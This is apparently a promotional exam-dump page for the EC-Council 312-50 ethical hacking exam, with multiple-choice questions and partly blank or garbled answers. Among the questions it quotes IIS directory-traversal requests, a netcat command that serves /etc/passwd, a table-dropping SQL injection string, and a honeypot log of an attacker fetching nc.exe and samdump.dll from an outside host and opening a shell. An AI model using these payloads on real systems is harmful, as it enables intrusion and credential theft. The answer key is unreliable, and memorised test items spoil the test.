Top Rebirth 312-50 exam guide Reviews!

Master the 312-50 Ethical Hacking and Countermeasures (CEHv6) content and be ready for exam day success quickly with this Testking 312-50 actual exam. We guarantee it!We make it a reality and give you real 312-50 questions in our EC-Council 312-50 braindumps.Latest 100% VALID EC-Council 312-50 Exam Questions Dumps at below page. You can use our EC-Council 312-50 braindumps and pass your exam.

Q181. You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250. 

Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server? 

A. 200-250 

B. 121-371 

C. 120-321 

D. 121-231 

E. 120-370 

Answer:

Explanation: Package number 120 have already been received by the server and the window is 250 packets, so any package number from 121 (next in sequence) to 371 (121+250). 


Q182. Vulnerability mapping occurs after which phase of a penetration test? 

A. Host scanning 

B. Passive information gathering 

C. Analysis of host scanning 

D. Network level discovery 

Answer: C

Explanation: The order should be Passive information gathering, Network level discovery, Host scanning and Analysis of host scanning. 


Q183. You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe. What caused this? 

GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 

A. The Morris worm 

B. The PIF virus 

C. Trinoo 

D. Nimda 

E. Code Red 

F. Ping of Death 

Answer: D

Explanation: The Nimda worm modifies all web content files it finds. As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby, infecting the browsing system. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines and allow intruders the ability to execute arbitrary commands within the Local System security context on machines running the unpatched versions of IIS. 


Q184. Assuring two systems that are using IPSec to protect traffic over the internet, what type of general attack could compromise the data? 

A. Spoof Attack 

B. Smurf Attack 

C. Man in the Middle Attack 

D. Trojan Horse Attack 

E. Back Orifice Attack 

Answer: DE

Explanation: To compromise the data, the attack would need to be executed before the encryption takes place at either end of the tunnel. Trojan Horse and Back Orifice attacks both allow for potential data manipulation on host computers. In both cases, the data would be compromised either before encryption or after decryption, so IPsec is not preventing the attack. 


Q185. Which type of Nmap scan is the most reliable, but also the most visible, and likely to be picked up by and IDS? 

A. SYN scan 

B. ACK scan 

C. RST scan 

D. Connect scan 

E. FIN scan 

Answer:

Explanation: The TCP full connect (-sT) scan is the most reliable. 


Q186. What does FIN in TCP flag define? 

A. Used to close a TCP connection 

B. Used to abort a TCP connection abruptly 

C. Used to indicate the beginning of a TCP connection 

D. Used to acknowledge receipt of a previous packet or transmission 

Answer: A

Explanation: The FIN flag stands for the word FINished. This flag is used to tear down the virtual connections created using the previous flag (SYN), so because of this reason, the FIN flag always appears when the last packets are exchanged between a connection. 


Q187. Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm? 

Select the best answer. 

A. There are two external DNS Servers for Internet domains. Both are AD integrated. 

B. All external DNS is done by an ISP. 

C. Internal AD Integrated DNS servers are using private DNS names that are 

D. unregistered. 

E. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server. 

Answer:

Explanations: 

A. There are two external DNS Servers for Internet domains. Both are AD integrated. This is the correct answer. Having an AD integrated DNS external server is a serious cause for alarm. There is no need for this and it causes vulnerability on the network. 

B. All external DNS is done by an ISP. 

This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk as it is offloaded onto the ISP. 

C. Internal AD Integrated DNS servers are using private DNS names that are unregistered. This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk. 

D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server. 

This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk. 


Q188. What does the following command in netcat do? 

nc -l -u -p 55555 < /etc/passwd 

A. logs the incoming connections to /etc/passwd file 

B. loads the /etc/passwd file to the UDP port 55555 

C. grabs the /etc/passwd file when connected to UDP port 55555 

D. deletes the /etc/passwd file when connected to the UDP port 55555 

Answer: C

Explanation: -l forces netcat to listen for incoming connections. 

-u tells netcat to use UDP instead of TCP 

-p 5555 tells netcat to use port 5555 

< /etc/passwd tells netcat to grab the /etc/passwd file when connected to. 


Q189. The following script shows a simple SQL injection. The script builds an SQL query by concatenating hard-coded strings together with a string entered by the user: 

The user is prompted to enter the name of a city on a Web form. If she enters Chicago, the query assembled by the script looks similar to the following: 

SELECT * FROM OrdersTable WHERE ShipCity = 'Chicago' 

How will you delete the OrdersTable from the database using SQL Injection? 

A. Chicago' drop table OrdersTable --

B. Delete table'blah' OrdersTable --

C. EXEC; SELECT * OrdersTable > DROP --

D. cmdshell' 'del c:sqlmydbOrdersTable' // 

Answer: A


Q190. Johnny is a member of the hacking group orpheus1. He is currently working on breaking into the Department of Defense’s front end exchange server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. 

What tool would be best used to accomplish this? 

A. RainbowCrack 

B. SMBCrack 

C. SmurfCrack 

D. PSCrack 

Answer: A

Explanation: RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time precomputation is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables. 

Topic 14, SQL Injection 

380. The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. 

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below: 

“cmd1.exe /c open 213.116.251.162 >ftpcom” 

“cmd1.exe /c echo johna2k >>ftpcom” 

“cmd1.exe /c echo haxedj00 >>ftpcom” 

“cmd1.exe /c echo get nc.exe >>ftpcom” 

“cmd1.exe /c echo get samdump.dll >>ftpcom” 

“cmd1.exe /c echo quit >>ftpcom” 

“cmd1.exe /c ftp –s:ftpcom” 

“cmd1.exe /c nc –l –p 6969 e-cmd1.exe” 

What can you infer from the exploit given? 

A. It is a local exploit where the attacker logs in using username johna2k. 

B. There are two attackers on the system – johna2k and haxedj00. 

C. The attack is a remote exploit and the hacker downloads three files. 

D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port. 

Answer: C